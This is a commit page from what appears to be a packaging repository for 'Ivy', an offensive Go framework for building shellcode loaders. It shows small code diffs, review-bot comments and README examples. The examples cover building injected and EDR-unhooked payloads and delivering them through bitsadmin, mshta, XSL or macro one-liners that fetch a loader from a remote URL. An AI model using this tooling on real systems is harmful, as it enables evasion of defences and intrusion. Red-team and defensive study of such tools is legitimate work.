Commit 924eb720 authored by Nong Hoang Tu's avatar Nong Hoang Tu

New upstream version 1.12

parent 5e727029
Pipeline #5473 failed with stages
......@@ -69,6 +69,7 @@ func randclassid() string {
}
func VarNumberLength(min, max int) string {
time.Sleep(2 * time.Millisecond)
var r string
rand.Seed(time.Now().UnixNano())
num := rand.Intn(max-min) + min
......@@ -79,7 +80,6 @@ func VarNumberLength(min, max int) string {
func StagelessArrayGen(data []byte) string {
var fmtStr string
//var StrSlice []string
aSlice := data
fmtStr = strings.Repeat("%d, ", len(aSlice)-1)
fmtStr += "%d"
......
......@@ -91,10 +91,12 @@ Their cries for mercy?
if opt.inputFile32 == "" && opt.inputFile64 == "" {
log.Fatal("Error: Please provide a path to a file containing a raw shellcode or payload")
}
if opt.outFile == "" {
log.Fatal("Error: Please provide a name for the payload the you wish to generate")
}
if opt.CommandLoader == "" || opt.CommandLoader == "bits" || opt.CommandLoader == "hta" || opt.CommandLoader == "macro" || opt.CommandLoader == "xsl" {
log.Fatal("Error: Invalid delivery command option, please choose one of the acceptable options")
}
if opt.inputFile32 != "" && opt.stageless == false {
Utils.PrintDebug(debugging, "Reading payload file %s\n", opt.inputFile32)
rawinputfile32 := Utils.Readfile(opt.inputFile32)
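Review bot: The delivery check `if opt.CommandLoader == "" || opt.CommandLoader == "bits" || …` is true for the empty default and for every value the error message treats as acceptable, so as rendered here any valid invocation reaches `log.Fatal` and only an unrecognised value gets through. The comparison reads as the inverse of what the message intends; an allow-list form such as `switch opt.CommandLoader { case "", "bits", "hta", "macro", "xsl": default: log.Fatal(...) }` states the intent directly and is harder to invert by accident. The +/- markers are lost on this page, so whether this line is new in 1.12 cannot be confirmed from here. Separately, `opt.stageless == false` is more idiomatic as `!opt.stageless`, and the enclosing function starts and ends outside the hunk.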
......
......@@ -53,6 +53,7 @@ type macro struct {
type sandbox struct {
Variables map[string]string
}
var buffer bytes.Buffer
//First
......@@ -71,7 +72,7 @@ func Java_Code_Buff(product string) (string, string, string, string, string, str
javacode.Variables["DecodedValue"] = Cryptor.VarNumberLength(4, 9)
javacode.Variables["shellcode"] = Cryptor.VarNumberLength(4, 9)
javacode.Variables["Auto_Open"] = Cryptor.VarNumberLength(4, 9)
if product == "Excel" {
struct_option = Struct.Javacode_Start_Excel()
}
......@@ -403,7 +404,7 @@ func XSL_Code_Buff(compiled string) string {
xsl.Variables = make(map[string]string)
xsl.Variables["payload"] = compiled
buffer.Reset()
xslTemplate, err := template.New("xsl").Parse(Struct.HTA_Loader())
xslTemplate, err := template.New("xsl").Parse(Struct.XSL_Loader())
if err != nil {
log.Fatal(err)
}
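Review bot: XSL_Code_Buff resets and reuses `buffer`, which appears to be the package-level `var buffer bytes.Buffer` declared earlier in this file, so every *_Code_Buff helper depends on `buffer.Reset()` being called at the right moment and none of them is safe to call concurrently. A function-local `var buf bytes.Buffer` would remove that hidden coupling. The parse failure also ends in `log.Fatal(err)` inside a helper that returns a string; returning the error wrapped as `fmt.Errorf("parsing xsl template: %w", err)` would let the caller decide how to exit, at the cost of a signature change that this hunk does not show the callers for. The function body continues past the hunk, so the template execution step is not visible here.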
......
......@@ -166,5 +166,77 @@ The delivery command line argument allows you to generate a command or string of
* Macro – This will generate an Office macro that can be put into an Excel or Word macro document. When this macro is executed, the loader will be downloaded from a remote source and executed, then removed.
* XSL - Generates a xsl stylesheet file containing the loader along with a one liner command execute the loader remotely.
# Examples
### Staged Inject payload
```
./Ivy -Ix64 test64.vba -Ix86 test32.vba -P Inject -O SampleInject.js
```
### Staged Local payload
```
./Ivy -Ix64 test64.c -Ix86 test32.c -P Local -O SampleLocal.js
```
### Stagless Local payload
```
./Ivy -stageless -Ix64 stageless64.bin -Ix86 stageless32.bin -P Local -O stageless.js
```
### Stagless Injected payload
```
./Ivy -stageless -Ix64 stageless64.bin -Ix86 stageless32.bin -P Inject -O stageless.js
```
### Stagless Injected payload spawning notepad.exe
```
./Ivy -stageless -Ix64 stageless64.bin -Ix86 stageless32.bin -P Inject -process64 C:\\windows\\system32\\notepad.exe -process32 C:\\windows\\SysWOW64\\notepad.exe -O stageless.js
```
### Unhooked Stagless Local payload
```
./Ivy -stageless -Ix64 stageless64.bin -Ix86 stageless32.bin -P Local -unhook -O stageless.js
```
### Unhooked Stagless Injected payload
```
./Ivy -stageless -Ix64 stageless64.bin -Ix86 stageless32.bin -P Inject -unhook -O stageless.js
```
## One Liner Commands Samples
### Non-Executable File Types
```
./Ivy -Ix64 stageless64.bin -Ix86 stageless32.bin -P Inject -O test.png -stageless
```
### Bitsadmin Command
```
./Ivy -Ix64 stageless64.bin -Ix86 stageless32.bin -P Local -O test.js -url http://ACME.com -delivery bits -stageless
```
### MSHTA.exe Command
```
./Ivy -Ix64 stageless64.bin -Ix86 stageless32.bin -P Local -O test.hta -url http://ACME.com -delivery hta -stageless
```
### Stylesheet Payload
```
./Ivy -Ix64 stageless64.bin -Ix86 stageless32.bin -P Local -O test.xsl -url http://ACME.com -delivery xsl -stageless
```
### Macro Web Downloader
```
./Ivy -Ix64 stageless64.bin -Ix86 stageless32.bin -P Local -O test.txt -url http://ACME.com/test.txt -delivery macro -stageless
```
# Known Issues
Currently there is a known issue with unhooking the remote injected process. A current work around is to load the [unhook](https://github.com/rsmudge/unhook-bof) BOF, for now.